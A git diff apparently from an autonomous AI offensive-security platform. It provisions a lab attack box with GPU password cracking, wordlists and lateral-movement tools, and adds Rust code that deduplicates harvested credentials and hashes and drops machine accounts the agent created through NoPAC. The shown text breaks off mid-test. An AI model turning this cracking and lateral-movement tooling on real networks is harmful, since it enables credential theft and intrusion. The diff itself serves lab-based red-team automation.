"windows-result", + "windows-strings", +] + [[package]] name = "windows-result" version = "0.4.1" diff --git a/Cargo.toml b/Cargo.toml index 3404af61..784d77f6 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -18,6 +18,7 @@ serde_yaml = "0.9" regex = "1" sqlx = { version = "0.8", features = ["runtime-tokio", "postgres", "chrono", "json", "uuid"] } tera = "1" +hickory-resolver = { version = "0.24", default-features = false, features = ["tokio-runtime", "system-config"] } # OpenTelemetry opentelemetry = "0.31" diff --git a/Taskfile.yaml b/Taskfile.yaml index 878b9d8b..d9b81157 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -26,6 +26,7 @@ includes: LOG_DIR: '{{.LOG_DIR}}' REPORT_DIR: '{{.REPORT_DIR}}' GRAFANA_URL: '{{.GRAFANA_URL}}' + LOKI_URL: '{{.LOKI_URL}}' DREADNODE_SERVER_URL: '{{.DREADNODE_SERVER_URL}}' DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION}}' DREADNODE_WORKSPACE: '{{.DREADNODE_WORKSPACE}}' @@ -51,6 +52,7 @@ includes: ARES_CONFIG: '{{.ARES_CONFIG}}' OTEL_TRACES_ENDPOINT: '{{.OTEL_TRACES_ENDPOINT}}' ALLOY_LOKI_ENDPOINT: '{{.ALLOY_LOKI_ENDPOINT}}' + LOKI_URL: '{{.LOKI_URL}}' blue: taskfile: .taskfiles/blue/Taskfile.yaml optional: true @@ -76,6 +78,7 @@ vars: # MODEL: '{{.MODEL | default "claude-sonnet-4-5-20250929"}}' MODEL: '{{.MODEL | default "gpt-5.2"}}' GRAFANA_URL: '{{.GRAFANA_URL}}' + LOKI_URL: '{{.LOKI_URL | default "https://loki.dev.plundr.ai"}}' POLL_INTERVAL: '{{.POLL_INTERVAL | default "30"}}' MAX_STEPS_BLUE: '{{.MAX_STEPS_BLUE | default "50"}}' MAX_STEPS_BLUE_ONCE: '{{.MAX_STEPS_BLUE_ONCE | default "15"}}' # ~15 min max for once mode diff --git a/ansible/playbooks/ares/goad_attack_box.yml b/ansible/playbooks/ares/goad_attack_box.yml index 2cc04435..7a30c485 100644 --- a/ansible/playbooks/ares/goad_attack_box.yml +++ b/ansible/playbooks/ares/goad_attack_box.yml @@ -32,7 +32,7 @@ alloy_deployment_name: "goad-attack-box" alloy_server_id: "" alloy_instance_id: "" - alloy_loki_endpoint: "{{ alloy_loki_endpoint }}" + alloy_loki_endpoint: "{{ lookup('env', 'ALLOY_LOKI_ENDPOINT') | default('http://localhost:3100/loki/api/v1/push', true) }}" alloy_version: "1.10.1" # Python version @@ -45,6 +45,12 @@ cracking_tools_gpu_support: true cracking_tools_hashcat_from_source: true cracking_tools_nvidia_opencl_icd: true + # Bake the kernel-mode NVIDIA driver + CUDA into the image. Without these, + # hashcat on g4dn (T4) reports "OpenCL platform not found" and falls back + # to john-on-CPU, which is too slow to feed credential cracks back into + # the orchestrator within an op's budget. + cracking_tools_install_nvidia_driver: true + cracking_tools_install_cuda_toolkit: true cracking_tools_wordlists: - rockyou - seclists_passwords @@ -113,9 +119,14 @@ changed_when: true roles: - # AWS infrastructure agents + # AWS infrastructure agents — skipped on non-AWS clouds because they + # require the EC2 instance metadata service (cloudwatch-agent's + # `fetch-config -m ec2` hits 169.254.169.254 and aborts the build + # on Azure). - role: dreadnode.nimbus_range.aws_ssm_agent + when: cloud_provider | default('aws') == 'aws' - role: dreadnode.nimbus_range.aws_cloudwatch_agent + when: cloud_provider | default('aws') == 'aws' # Base Ares requirements - role: dreadnode.nimbus_range.base diff --git a/ansible/roles/base/README.md b/ansible/roles/base/README.md index 6c13b679..a4449559 100644 --- a/ansible/roles/base/README.md +++ b/ansible/roles/base/README.md @@ -34,10 +34,9 @@ Base requirements for Ares AI agents | `base_pip_packages.0` | str | python-dotenv | No description | | `base_pip_packages.1` | str | rigging>=3.0 | No description | | `base_pip_packages.2` | str | pydantic | No description | -| `base_pip_packages.3` | str | asyncio | No description | -| `base_pip_packages.4` | str | aiohttp>=3.13.4 | No description | -| `base_pip_packages.5` | str | cryptography>=44.0.1 | No description | -| `base_pip_packages.6` | str | requests>=2.33.0 | No description | +| `base_pip_packages.3` | str | aiohttp>=3.13.4 | No description | +| `base_pip_packages.4` | str | cryptography>=44.0.1 | No description | +| `base_pip_packages.5` | str | requests>=2.33.0 | No description | | `base_pip_externally_managed` | bool | False | No description | | `base_pip_break_required` | bool | False | No description | | `base_system_packages` | list | [] | No description | @@ -140,7 +139,10 @@ Base requirements for Ares AI agents - **Fail when break-system-packages is required but disabled** (ansible.builtin.fail) - Conditional - **Fail when break-system-packages is required but unsupported by pip** (ansible.builtin.fail) - Conditional - **Upgrade pip to latest (CVE fixes)** (ansible.builtin.command) -- **Install Ares Python dependencies** (ansible.builtin.pip) +- **Install Ares Python dependencies (with full log)** (ansible.builtin.shell) +- **Show pip install log tail on failure** (ansible.builtin.command) - Conditional +- **Print pip install tail** (ansible.builtin.debug) - Conditional +- **Fail if pip install failed** (ansible.builtin.fail) - Conditional - **Create Ares workspace directory** (ansible.builtin.file) - Conditional ### main.yml diff --git a/ansible/roles/base/defaults/main.yml b/ansible/roles/base/defaults/main.yml index 6588b5a0..e366f5da 100644 --- a/ansible/roles/base/defaults/main.yml +++ b/ansible/roles/base/defaults/main.yml @@ -28,11 +28,14 @@ base_rust_install_script: "https://sh.rustup.rs" base_install_pipx: true # Ares Python dependencies (installed via pip) +# Do NOT add `asyncio` here — Python 3.4+ ships asyncio in the stdlib. The +# PyPI `asyncio` package is a 2015-era stub that ships an `asyncio.py` into +# site-packages, shadowing the stdlib module and breaking any import of +# asyncio (including the rest of this pip install run on Python 3.13). base_pip_packages: - python-dotenv - "rigging>=3.0" - pydantic - - asyncio - "aiohttp>=3.13.4" - "cryptography>=44.0.1" - "requests>=2.33.0" diff --git a/ansible/roles/base/tasks/linux.yml b/ansible/roles/base/tasks/linux.yml index 62d42782..4b7350ab 100644 --- a/ansible/roles/base/tasks/linux.yml +++ b/ansible/roles/base/tasks/linux.yml @@ -142,16 +142,50 @@ become: true changed_when: false -- name: Install Ares Python dependencies - ansible.builtin.pip: - name: "{{ base_pip_packages }}" - state: present - executable: "{{ base_pip_executable }}" - extra_args: >- - {{ '--break-system-packages' if base_pip_break_required else '' }} - {{ '--ignore-installed' if ansible_facts['os_family'] == 'Debian' else '' }} +# Run pip directly via shell so we can tee stdout+stderr to a log file. The +# ansible.builtin.pip module captures output into a single `msg` field that +# is too large for CloudWatch's per-event size limit on this dep tree +# (rigging pulls 100+ transitives), so failures show up as a truncated stdout +# with no stderr or rc visible. The tee'd log lets the next task surface the +# real error. +# +# `--ignore-installed` is required: Kali ships several Python deps via apt +# (python3-requests, python3-cryptography, python3-urllib3, python3-yaml). +# apt-installed packages have no pip RECORD file, so pip's normal upgrade +# path fails with `uninstall-no-record-file` ("The package was installed +# by debian"). `--ignore-installed` skips uninstall and overwrites in place. +- name: Install Ares Python dependencies (with full log) + ansible.builtin.shell: + cmd: | + set -o pipefail + {{ base_pip_executable }} install \ + {{ '--break-system-packages' if base_pip_break_required else '' }} \ + --ignore-installed \ + --no-color \ + {{ base_pip_packages | map('quote') | join(' ') }} \ + 2>&1 | tee /tmp/ares-pip-install.log + executable: /bin/bash + become: true + register: base_pip_install_result + changed_when: false + failed_when: false + +- name: Show pip install log tail on failure + ansible.builtin.command: tail -120 /tmp/ares-pip-install.log become: true + register: base_pip_install_tail changed_when: false + when: base_pip_install_result.rc != 0 + +- name: Print pip install tail + ansible.builtin.debug: + var: base_pip_install_tail.stdout_lines + when: base_pip_install_result.rc != 0 + +- name: Fail if pip install failed + ansible.builtin.fail: + msg: "pip install failed (rc={{ base_pip_install_result.rc }}); see tail above" + when: base_pip_install_result.rc != 0 - name: Create Ares workspace directory ansible.builtin.file: diff --git a/ansible/roles/cracking_tools/README.md b/ansible/roles/cracking_tools/README.md index 6c12b795..29795586 100644 --- a/ansible/roles/cracking_tools/README.md +++ b/ansible/roles/cracking_tools/README.md @@ -53,6 +53,17 @@ Install and configure password cracking tools for Ares agents | `cracking_tools_opencl_packages.1` | str | opencl-headers | No description | | `cracking_tools_opencl_packages.2` | str | clinfo | No description | | `cracking_tools_nvidia_opencl_icd` | bool | False | No description | +| `cracking_tools_install_nvidia_driver` | bool | False | No description | +| `cracking_tools_install_cuda_toolkit` | bool | False | No description | +| `cracking_tools_nvidia_driver_packages` | list | [] | No description | +| `cracking_tools_nvidia_driver_packages.0` | str | linux-headers-cloud-amd64 | No description | +| `cracking_tools_nvidia_driver_packages.1` | str | dkms | No description | +| `cracking_tools_nvidia_driver_packages.2` | str | firmware-misc-nonfree | No description | +| `cracking_tools_nvidia_driver_packages.3` | str | nvidia-driver | No description | +| `cracking_tools_nvidia_driver_packages.4` | str | nvidia-opencl-icd | No description | +| `cracking_tools_nvidia_driver_packages.5` | str | nvidia-opencl-common | No description | +| `cracking_tools_nvidia_cuda_toolkit_packages` | list | [] | No description | +| `cracking_tools_nvidia_cuda_toolkit_packages.0` | str | nvidia-cuda-toolkit | No description | | `cracking_tools_update_cache` | bool | True | No description | ## Tasks @@ -94,9 +105,17 @@ Install and configure password cracking tools for Ares agents - **Set DEBIAN_FRONTEND to noninteractive** (ansible.builtin.lineinfile) - Conditional - **Update apt cache** (ansible.builtin.apt) - Conditional - **Create wordlist directory** (ansible.builtin.file) +- **Install NVIDIA driver and OpenCL runtime (with full log)** (ansible.builtin.shell) - Conditional +- **Show NVIDIA install log tail on failure** (ansible.builtin.command) - Conditional +- **Print NVIDIA install tail** (ansible.builtin.debug) - Conditional +- **Fail if NVIDIA install failed** (ansible.builtin.fail) - Conditional +- **Install NVIDIA CUDA toolkit** (ansible.builtin.apt) - Conditional - **Install GPU support packages** (ansible.builtin.apt) - Conditional - **Create OpenCL vendors directory** (ansible.builtin.file) - Conditional - **Register NVIDIA OpenCL ICD** (ansible.builtin.copy) - Conditional +- **Verify NVIDIA driver (non-fatal — no GPU on builder hosts)** (ansible.builtin.command) - Conditional +- **Verify OpenCL platform discovery (non-fatal)** (ansible.builtin.command) - Conditional +- **Show GPU/OpenCL detection summary** (ansible.builtin.debug) - Conditional - **Ensure libgcc runtime is present for hashcat** (block) - Conditional - **Install primary libgcc package** (ansible.builtin.apt) - **Ensure libgcc static archive is present for hashcat** (block) - Conditional diff --git a/ansible/roles/cracking_tools/defaults/main.yml b/ansible/roles/cracking_tools/defaults/main.yml index 4fe3e9b7..af1d326c 100644 --- a/ansible/roles/cracking_tools/defaults/main.yml +++ b/ansible/roles/cracking_tools/defaults/main.yml @@ -50,4 +50,35 @@ cracking_tools_opencl_packages: # Set to true when using nvidia/cuda base image to register NVIDIA OpenCL ICD cracking_tools_nvidia_opencl_icd: false +# Install the NVIDIA kernel-mode driver + OpenCL runtime on the host. Required +# on bare-metal/AMI builds (g4dn etc.) where the Kali base image ships without +# any NVIDIA bits — without this hashcat reports "OpenCL platform not found". +# Leave false for container builds: the nvidia/cuda runtime base image +# already provides libnvidia-opencl/libcuda, and the kernel module comes +# from the host via nvidia-container-toolkit. +cracking_tools_install_nvidia_driver: false +# Install the full CUDA toolkit so hashcat can use the CUDA backend (faster +# than OpenCL on T4/A10/etc.). Pulls ~3GB; only enable on AMI builds. +cracking_tools_install_cuda_toolkit: false +# Recommends are intentionally enabled — DKMS, libcuda1, and the kernel +# module build chain come in via Recommends on Debian/Kali. +# Kali AMIs ship `+kali-cloud-amd64` kernel — needs the `cloud` headers +# meta-package. We pull driver + open-source kernel module from NVIDIA's +# CUDA Debian repo (added in tasks/linux.yml) because Kali's archive +# nvidia-driver (550.163.01) does not build against kernel 6.19+. +# `nvidia-kernel-open-dkms` is required for Turing+ (T4 included) on +# modern kernels; legacy `nvidia-kernel-dkms` is a dead-end here. Pair it +# with `nvidia-driver-cuda` (CUDA-only userspace) — the `cuda-drivers` +# meta and full `nvidia-driver` both pull `nvidia-kernel-dkms` (closed +# kernel module), which Conflicts with the open variant. +cracking_tools_nvidia_driver_packages: + - linux-headers-cloud-amd64 + - dkms + - firmware-misc-nonfree + - nvidia-kernel-open-dkms + - nvidia-driver-cuda + - nvidia-opencl-icd +cracking_tools_nvidia_cuda_toolkit_packages: + - nvidia-cuda-toolkit + cracking_tools_update_cache: true diff --git a/ansible/roles/cracking_tools/tasks/linux.yml b/ansible/roles/cracking_tools/tasks/linux.yml index 551746d3..367f9d24 100644 --- a/ansible/roles/cracking_tools/tasks/linux.yml +++ b/ansible/roles/cracking_tools/tasks/linux.yml @@ -24,6 +24,131 @@ mode: '0755' become: true +# Kali rolling ships kernel 6.19.x, which the Kali archive's NVIDIA driver +# (550.163.01) cannot compile against — DKMS exits 2. NVIDIA's official +# CUDA Debian repo carries 575+ which supports modern kernels and offers +# `nvidia-open-kernel-dkms` (open-source kernel module) for Turing+ GPUs. +# We add this repo first so the apt install below resolves to fresh +# packages instead of the stale Kali ones. +- name: Add NVIDIA CUDA apt repository (Kali ships 550.x which fails on kernel 6.19+) + ansible.builtin.shell: | + set -euxo pipefail + cd /tmp + curl -fsSLo cuda-keyring.deb \ + https://developer.download.nvidia.com/compute/cuda/repos/debian13/x86_64/cuda-keyring_1.1-1_all.deb + apt-get install -y ./cuda-keyring.deb + apt-get update -q + rm -f cuda-keyring.deb + args: + creates: /usr/share/keyrings/cuda-archive-keyring.gpg + executable: /bin/bash + become: true + when: + - cracking_tools_install_nvidia_driver | bool + - ansible_facts['os_family'] == 'Debian' + +# Install kernel headers + dkms FIRST in their own apt transaction, so they +# are fully configured before NVIDIA's dpkg postinst runs `dkms autoinstall`. +# When mixed in a single apt-get call, dpkg may configure +# `nvidia-kernel-open-dkms` before `linux-headers-cloud-amd64` finishes +# setting up, and DKMS exits 2 because the headers aren't yet in place. +- name: Install kernel headers and DKMS prerequisites + ansible.builtin.apt: + name: + - linux-headers-cloud-amd64 + - dkms + - build-essential + - firmware-misc-nonfree + state: present + install_recommends: true + become: true + when: + - cracking_tools_install_nvidia_driver | bool + - ansible_facts['os_family'] == 'Debian' + +# Driven through shell+tee instead of ansible.builtin.apt: the apt module +# captures dpkg stderr but truncates large stdout (DKMS kernel-module build +# errors land deep in apt-get's output, well after the cutoff). With tee we +# can show the real error on failure. +- name: Install NVIDIA driver and OpenCL runtime (with full log) + ansible.builtin.shell: + cmd: | + set -o pipefail + DEBIAN_FRONTEND=noninteractive apt-get install -y \ + -o Dpkg::Options::=--force-confdef \ + -o Dpkg::Options::=--force-confold \ + -o APT::Install-Recommends=yes \ + {{ cracking_tools_nvidia_driver_packages | map('quote') | join(' ') }} \ + 2>&1 | tee /tmp/ares-nvidia-install.log + executable: /bin/bash + become: true + register: cracking_tools_nvidia_install_result + changed_when: false + failed_when: false + when: + - cracking_tools_install_nvidia_driver | bool + - ansible_facts['os_family'] == 'Debian' + +- name: Show NVIDIA install log tail on failure + ansible.builtin.command: tail -200 /tmp/ares-nvidia-install.log + become: true + register: cracking_tools_nvidia_install_tail + changed_when: false + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Print NVIDIA install tail + ansible.builtin.debug: + var: cracking_tools_nvidia_install_tail.stdout_lines + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Dump DKMS make.log on failure + ansible.builtin.shell: | + set +e + for f in /var/lib/dkms/nvidia/*/build/make.log; do + echo "==== $f ====" + tail -150 "$f" 2>&1 || true + done + echo "==== build env ====" + which gcc cc make 2>&1 || true + gcc --version 2>&1 || true + dpkg -l build-essential gcc make 2>&1 | tail -10 || true + args: + executable: /bin/bash + register: cracking_tools_dkms_make_log + changed_when: false + failed_when: false + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Print DKMS make.log + ansible.builtin.debug: + var: cracking_tools_dkms_make_log.stdout_lines + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Fail if NVIDIA install failed + ansible.builtin.fail: + msg: "NVIDIA driver install failed (rc={{ cracking_tools_nvidia_install_result.rc }}); see tail above" + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Install NVIDIA CUDA toolkit + ansible.builtin.apt: + name: "{{ cracking_tools_nvidia_cuda_toolkit_packages }}" + state: present + install_recommends: true + become: true + when: + - cracking_tools_install_cuda_toolkit | bool + - ansible_facts['os_family'] == 'Debian' + - name: Install GPU support packages ansible.builtin.apt: name: "{{ cracking_tools_opencl_packages }}" @@ -51,6 +176,33 @@ - cracking_tools_gpu_support | bool - cracking_tools_nvidia_opencl_icd | default(false) | bool +# nvidia-smi/clinfo will return non-zero on a CPU-only AMI builder (no GPU +# attached) — that's expected. The check is purely informational so a logged +# failure on the first GPU boot is easy to spot. +- name: Verify NVIDIA driver (non-fatal — no GPU on builder hosts) + ansible.builtin.command: nvidia-smi + register: cracking_tools_nvidia_smi + changed_when: false + failed_when: false + when: cracking_tools_install_nvidia_driver | bool + +- name: Verify OpenCL platform discovery (non-fatal) + ansible.builtin.command: clinfo -l + register: cracking_tools_clinfo + changed_when: false + failed_when: false + when: + - cracking_tools_gpu_support | bool + - cracking_tools_install_nvidia_driver | bool + +- name: Show GPU/OpenCL detection summary + ansible.builtin.debug: + msg: + - "nvidia-smi rc={{ cracking_tools_nvidia_smi.rc | default('skipped') }}" + - "clinfo rc={{ cracking_tools_clinfo.rc | default('skipped') }}" + - "{{ cracking_tools_clinfo.stdout | default('clinfo not run') }}" + when: cracking_tools_install_nvidia_driver | bool + - name: Ensure libgcc runtime is present for hashcat when: - cracking_tools_install_hashcat diff --git a/ansible/roles/lateral_movement_tools/README.md b/ansible/roles/lateral_movement_tools/README.md index 8d194ff0..690de5fd 100644 --- a/ansible/roles/lateral_movement_tools/README.md +++ b/ansible/roles/lateral_movement_tools/README.md @@ -118,7 +118,7 @@ Install and configure lateral movement and credential extraction tools for Ares - **Create symlink for ffitarget.h in standard include path** (ansible.builtin.file) - Conditional - **Install rubyzip gem for evil-winrm dependency** (community.general.gem) - Conditional - **Install evil-winrm gem (Ubuntu only, Kali uses apt)** (community.general.gem) - Conditional -- **Update vulnerable ruby gem dependencies (net-imap, resolv, rexml, uri, zlib)** (ansible.builtin.command) - Conditional +- **Update vulnerable ruby gem dependencies (Ubuntu only - Kali patches via apt)** (ansible.builtin.command) - Conditional - **Install pth-toolkit (Kali only - may not be available in all repos)** (ansible.builtin.apt) - Conditional - **Warn if pth-toolkit installation failed** (ansible.builtin.debug) - Conditional - **Install Impacket from source for lateral movement tools** (ansible.builtin.include_tasks) - Conditional diff --git a/ansible/roles/lateral_movement_tools/tasks/linux.yml b/ansible/roles/lateral_movement_tools/tasks/linux.yml index 5ca9c59f..3abc6318 100644 --- a/ansible/roles/lateral_movement_tools/tasks/linux.yml +++ b/ansible/roles/lateral_movement_tools/tasks/linux.yml @@ -229,12 +229,25 @@ - ansible_facts['distribution'] != 'Kali' - lateral_movement_tools_install_evil_winrm -- name: Update vulnerable ruby gem dependencies (net-imap, resolv, rexml, uri, zlib) - ansible.builtin.command: gem update net-imap resolv rexml uri zlib +# `gem update` is skipped on Kali: evil-winrm ships via apt and Kali tracks +# CVE patches for net-imap/rexml/uri/zlib through its `ruby-*` debs. On +# AMI builders, `gem update` here also tends to SIGKILL (rc=-9) inside the +# Image Builder runner regardless of `--no-document`, so we keep it +# best-effort with `failed_when: false` and limit it to non-Kali Debian. +- name: Update vulnerable ruby gem dependencies (Ubuntu only - Kali patches via apt) + ansible.builtin.command: gem update --no-document {{ item }} become: true changed_when: true + failed_when: false + loop: + - net-imap + - resolv + - rexml + - uri + - zlib when: - ansible_facts['os_family'] == 'Debian' + - ansible_facts['distribution'] != 'Kali' - lateral_movement_tools_install_evil_winrm - name: Install pth-toolkit (Kali only - may not be available in all repos) diff --git a/ares-cli/Cargo.toml b/ares-cli/Cargo.toml index ba2f93bf..7f4ff676 100644 --- a/ares-cli/Cargo.toml +++ b/ares-cli/Cargo.toml @@ -32,6 +32,7 @@ regex = { workspace = true } dotenvy = "0.15" async-trait = "0.1" thiserror = { workspace = true } +hickory-resolver = { workspace = true } [build-dependencies] serde = { version = "1", features = ["derive"] } diff --git a/ares-cli/src/dedup/credentials.rs b/ares-cli/src/dedup/credentials.rs index d31ae140..416d0401 100644 --- a/ares-cli/src/dedup/credentials.rs +++ b/ares-cli/src/dedup/credentials.rs @@ -5,7 +5,7 @@ use std::sync::LazyLock; use ares_core::models::Credential; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; /// Strip ANSI escape sequences from text. pub(super) static RE_ANSI: LazyLock = @@ -75,6 +75,9 @@ pub(crate) fn sanitize_credentials(creds: &mut Vec) { if username.starts_with("evil") && username.ends_with('$') { return false; } + if is_ghost_machine_account(&username) { + return false; + } true }); } diff --git a/ares-cli/src/dedup/domains.rs b/ares-cli/src/dedup/domains.rs index b0bd5a0c..82818add 100644 --- a/ares-cli/src/dedup/domains.rs +++ b/ares-cli/src/dedup/domains.rs @@ -179,12 +179,14 @@ pub(crate) fn normalize_state_domains( { let mut valid_domains: HashSet = HashSet::new(); + let mut host_fqdns: HashSet = HashSet::new(); if let Some(td) = target_domain { valid_domains.insert(td.to_lowercase()); } for host in hosts { if !host.hostname.is_empty() && host.hostname.contains('.') { let lower = host.hostname.to_lowercase(); + host_fqdns.insert(lower.clone()); let parts: Vec<&str> = lower.split('.').collect(); if parts.len() > 1 { valid_domains.insert(parts[1..].join(".")); @@ -193,10 +195,20 @@ pub(crate) fn normalize_state_domains( } for user in users { if !user.domain.is_empty() { - valid_domains.insert(user.domain.to_lowercase()); + let d = user.domain.to_lowercase(); + // Skip user.domain values that are actually a host FQDN — + // some parsers misattribute and assign the DC's FQDN as the + // user's AD domain, which would otherwise let the FQDN survive + // the retain() filter below as a phantom "domain". + if !host_fqdns.contains(&d) { + valid_domains.insert(d); + } } } - domains.retain(|d| valid_domains.contains(&d.to_lowercase())); + domains.retain(|d| { + let lower = d.to_lowercase(); + valid_domains.contains(&lower) && !host_fqdns.contains(&lower) + }); } } diff --git a/ares-cli/src/dedup/hashes.rs b/ares-cli/src/dedup/hashes.rs index 184bbec8..26c84e1f 100644 --- a/ares-cli/src/dedup/hashes.rs +++ b/ares-cli/src/dedup/hashes.rs @@ -1,9 +1,9 @@ -use std::collections::HashSet; +use std::collections::{HashMap, HashSet}; use ares_core::models::Hash; use super::credentials::strip_ansi; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; fn normalize_hash_type(hash_type: &str) -> String { match hash_type.trim().to_lowercase().as_str() { @@ -17,20 +17,58 @@ fn normalize_hash_type(hash_type: &str) -> String { } pub(crate) fn dedup_hashes(hashes: &[Hash]) -> Vec { - let mut seen = HashSet::new(); - let mut result = Vec::new(); + // First pass: for each (username, hash_type, hash_value), remember the longest + // non-empty domain we've seen. Parsers sometimes emit the same hash twice — once + // with `DOMAIN\` prefix (populated domain) and once bare (empty domain) — and + // without this lookup the keyed-by-domain dedup keeps both as separate rows. + let mut domain_lookup: HashMap<(String, String, String), String> = HashMap::new(); for h in hashes { let domain = strip_trailing_dot(h.domain.trim()).to_lowercase(); - let hash_value = strip_ansi(&h.hash_value); + if domain.is_empty() { + continue; + } let key = ( - domain.clone(), h.username.trim().to_lowercase(), h.hash_type.trim().to_lowercase(), - hash_value.trim().to_lowercase(), + strip_ansi(&h.hash_value).trim().to_lowercase(), ); + domain_lookup + .entry(key) + .and_modify(|d| { + if domain.len() > d.len() { + *d = domain.clone(); + } + }) + .or_insert(domain); + } + + let mut seen = HashSet::new(); + let mut result = Vec::new(); + for h in hashes { + let username = strip_ansi(&h.username); + if is_ghost_machine_account(&username) { + continue; + } + let username_l = h.username.trim().to_lowercase(); + let hash_type_l = h.hash_type.trim().to_lowercase(); + let hash_value = strip_ansi(&h.hash_value); + let hash_value_l = hash_value.trim().to_lowercase(); + + let mut domain = strip_trailing_dot(h.domain.trim()).to_lowercase(); + if domain.is_empty() { + if let Some(d) = domain_lookup.get(&( + username_l.clone(), + hash_type_l.clone(), + hash_value_l.clone(), + )) { + domain.clone_from(d); + } + } + + let key = (domain.clone(), username_l, hash_type_l, hash_value_l); if seen.insert(key) { let mut cleaned = h.clone(); - cleaned.domain = strip_trailing_dot(cleaned.domain.trim()).to_lowercase(); + cleaned.domain = domain; cleaned.hash_type = normalize_hash_type(&cleaned.hash_type); cleaned.hash_value = hash_value.trim().to_string(); cleaned.username = strip_ansi(&cleaned.username); diff --git a/ares-cli/src/dedup/mod.rs b/ares-cli/src/dedup/mod.rs index 9ae3550e..78f78211 100644 --- a/ares-cli/src/dedup/mod.rs +++ b/ares-cli/src/dedup/mod.rs @@ -7,9 +7,32 @@ pub(crate) mod users; #[cfg(test)] mod tests; -/// Strip trailing DNS root dot from domain strings (e.g. `child.contoso.local.` → `child.contoso.local`). +use regex::Regex; +use std::sync::LazyLock; + +/// Strip trailing DNS root dot and NetExec "0." artifact from domain strings +/// (e.g. `child.contoso.local.` → `child.contoso.local`, +/// `contoso.local0` → `contoso.local`). pub(super) fn strip_trailing_dot(s: &str) -> &str { - s.strip_suffix('.').unwrap_or(s) + let s = s.trim_end_matches('.'); + // NetExec sometimes appends "0" to domain TLDs. Strip if the char + // before the trailing 0 is alphabetic (i.e. TLD-like, not "host10"). + match s.strip_suffix('0') { + Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean, + _ => s, + } +} + +/// Auto-generated Windows hostname pattern (`WIN-` + 11 alphanumerics + optional `$`). +/// Used to filter ghost machine accounts that the agent created itself via +/// NoPAC / MachineAccountQuota — not real lab hosts, just our own residue. +static GHOST_MACHINE_ACCOUNT_RE: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)^WIN-[A-Z0-9]{11}\$?$").unwrap()); + +/// True if `username` looks like an auto-generated Windows machine account +/// (e.g. `WIN-G9FWV8ZNSCL$`) — typically agent-created via NoPAC. +pub(crate) fn is_ghost_machine_account(username: &str) -> bool { + GHOST_MACHINE_ACCOUNT_RE.is_match(username.trim()) } pub(crate) use credentials::{dedup_credentials, sanitize_credentials}; diff --git a/ares-cli/src/dedup/tests.rs b/ares-cli/src/dedup/tests.rs index 37741985..2570f229 100644 --- a/ares-cli/src/dedup/tests.rs +++ b/ares-cli/src/dedup/tests.rs @@ -361,6 +361,25 @@ fn strip_trailing_dot_removes_dot() { assert_eq!(strip_trailing_dot("."), ""); } +#[test] +fn strip_trailing_dot_removes_netexec_zero_artifact() { + use super::strip_trailing_dot; + // NetExec appends "0" or "0." to domain names + assert_eq!(strip_trailing_dot("contoso.local0"), "contoso.local"); + assert_eq!(strip_trailing_dot("contoso.local0."), "contoso.local"); + assert_eq!( + strip_trailing_dot("child.contoso.local0"), + "child.contoso.local" + ); + assert_eq!(strip_trailing_dot("fabrikam.local0."), "fabrikam.local"); + // Must NOT strip real trailing 0 from hostnames like "host10" + assert_eq!(strip_trailing_dot("host10"), "host10"); + assert_eq!( + strip_trailing_dot("dc10.contoso.local"), + "dc10.contoso.local" + ); +} + #[test] fn strip_ansi_removes_escape_sequences() { use super::credentials::strip_ansi; @@ -621,6 +640,26 @@ fn normalize_state_domains_domain_filtering_based_on_host_fqdns() { assert!(!domains.contains(&"orphan.local".to_string())); } +#[test] +fn normalize_state_domains_drops_host_fqdn_masquerading_as_domain() { + // A parser/credential publish path sometimes pushes a DC's FQDN + // (e.g. `WIN-30DZ5NGFA7M.c26h.local`) into the domain set. The dedup + // filter must drop entries that exactly match a known host hostname, + // even when a user or credential has the FQDN in its `domain` field. + let users = vec![make_user("win-30dz5ngfa7m.c26h.local", "admin")]; + let mut creds = vec![]; + let mut hashes = vec![]; + let mut domains = vec![ + "c26h.local".to_string(), + "win-30dz5ngfa7m.c26h.local".to_string(), + ]; + let hosts = vec![make_host("192.168.58.10", "win-30dz5ngfa7m.c26h.local")]; + + normalize_state_domains(&users, &mut creds, &mut hashes, &mut domains, &hosts, None); + + assert_eq!(domains, vec!["c26h.local".to_string()]); +} + #[test] fn normalize_state_domains_domain_kept_from_target_domain() { // target_domain should cause that domain to be retained even without hosts/users. @@ -1055,3 +1094,118 @@ fn dedup_credentials_normalizes_username_case() { let deduped = dedup_credentials(&creds); assert_eq!(deduped[0].username, "admin"); } + +#[test] +fn is_ghost_machine_account_matches_nopac_pattern() { + use super::is_ghost_machine_account; + assert!(is_ghost_machine_account("WIN-G9FWV8ZNSCL$")); + assert!(is_ghost_machine_account("WIN-4D75DLR6UCC$")); + assert!(is_ghost_machine_account("win-bjak8xunhgd$")); + // without trailing $ + assert!(is_ghost_machine_account("WIN-3KSGCLTS7NX")); +} + +#[test] +fn is_ghost_machine_account_rejects_real_hosts() { + use super::is_ghost_machine_account; + assert!(!is_ghost_machine_account("DC01$")); + assert!(!is_ghost_machine_account("WS01$")); + assert!(!is_ghost_machine_account("WIN-2019$")); // wrong length + assert!(!is_ghost_machine_account("administrator")); + assert!(!is_ghost_machine_account("")); +} + +#[test] +fn sanitize_credentials_drops_ghost_machine_accounts() { + let mut creds = vec![ + make_cred("contoso.local", "WIN-G9FWV8ZNSCL$", "P@ss1"), + make_cred("contoso.local", "jdoe", "P@ss1"), + ]; + sanitize_credentials(&mut creds); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "jdoe"); +} + +#[test] +fn dedup_hashes_collapses_bare_and_prefixed_same_user() { + // Parsers emit the same hash twice when secretsdump output mixes + // `Administrator:RID:...` (bare) and `DOMAIN\Administrator:RID:...` (prefixed) + // — bare gets empty domain, prefixed gets the resolved FQDN. + // The bare row 